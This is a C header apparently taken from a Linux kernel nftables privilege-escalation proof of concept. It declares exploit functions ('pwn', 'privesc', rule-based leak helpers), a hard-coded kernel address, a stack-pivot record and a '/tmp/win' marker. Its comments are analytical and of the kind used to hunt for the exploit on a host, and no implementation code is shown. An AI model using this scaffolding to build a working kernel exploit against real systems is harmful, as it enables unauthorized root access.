#pragma once
#include <stdint.h>
#include <sys/socket.h>
/*
 * TMP_WINDPROBE: the 8 bytes 2f 74 6d 70 2f 77 69 6e, i.e. the ASCII string
 * "/tmp/win" packed little-endian into one 64-bit word. A filesystem path
 * hidden inside an integer constant is a useful artifact when hunting for
 * this PoC on a host; how the consuming .c file uses it is not shown here.
 */
#define TMP_WINDPROBE   0x6e69772f706d742f
/*
 * INSTR_BASE: a hard-coded kernel virtual address (the 0xffffffff8... range
 * is typical of the x86-64 kernel text mapping). A fixed value like this can
 * only match one specific kernel build and does not survive KASLR, so the
 * PoC is inherently brittle across targets — the .c file that consumes it is
 * not part of this header, so treat this as an inference.
 */
#define INSTR_BASE      0xffffffff81a4fe94

/*
 * Packed (padding-free) record: 1 + 4*8 + 31 = 64 bytes on an LP64 target.
 * The commented-out `ops` member and the odd-sized `pad[31]` suggest the
 * layout is hand-matched to a fixed-size structure defined elsewhere, so
 * field order, widths and the pack pragmas are coupled — verify the expected
 * total size against the consumer before altering any of them.
 */
#pragma pack(push,1)
struct jumpstack_t {
    unsigned char init;       // one-byte flag; its meaning is not established in this header
    unsigned long rule;       // presumably pointer-sized values carried as integers — unverified
    unsigned long last_rule;
    unsigned long expr;
    //unsigned long ops;      // kept from the original; `pad` below presumably absorbs its space — unverified
    unsigned long pivot;
    unsigned char pad[31];    // brings the record to 64 bytes on LP64
};
#pragma pack(pop)

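/*
 * Prototypes only; the definitions live in the companion .c file, which is
 * not part of this header.
 *
 * `struct mnl_socket` is libmnl's socket type. It is forward-declared here so
 * that every prototype below names the same (incomplete) file-scope type no
 * matter whether <libmnl/libmnl.h> was included first. Without this, C gives
 * each prototype its own parameter-scoped `struct mnl_socket`, the compiler
 * warns that it "will not be visible outside of this definition", and
 * callers passing a real libmnl socket get incompatible-pointer errors.
 *
 * Parameters shared by the create_* functions (meanings inferred from the
 * names; the header establishes nothing beyond the types):
 *   nl                      netlink socket the rule is sent on
 *   table_name, chain_name  table/chain the rule is attached to (presumably nftables)
 *   family                  address family
 *   handle                  out-parameter, presumably receives the assigned rule handle
 *   seq                     in/out netlink sequence counter — TODO confirm it is incremented per message
 * All return int; the success/failure convention (0/-1, errno-style, ...)
 * is not visible from this header.
 */
struct mnl_socket;

int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
/* offset/len: two extra byte-sized inputs; their units and range are not established here. */
int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len);
int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
/* regs/instr: two unsigned long inputs; instr is presumably related to INSTR_BASE above — unverified. */
int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr);
int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr);
/* `(void)` rather than `()` so the compiler rejects calls that pass arguments. */
int privesc(void);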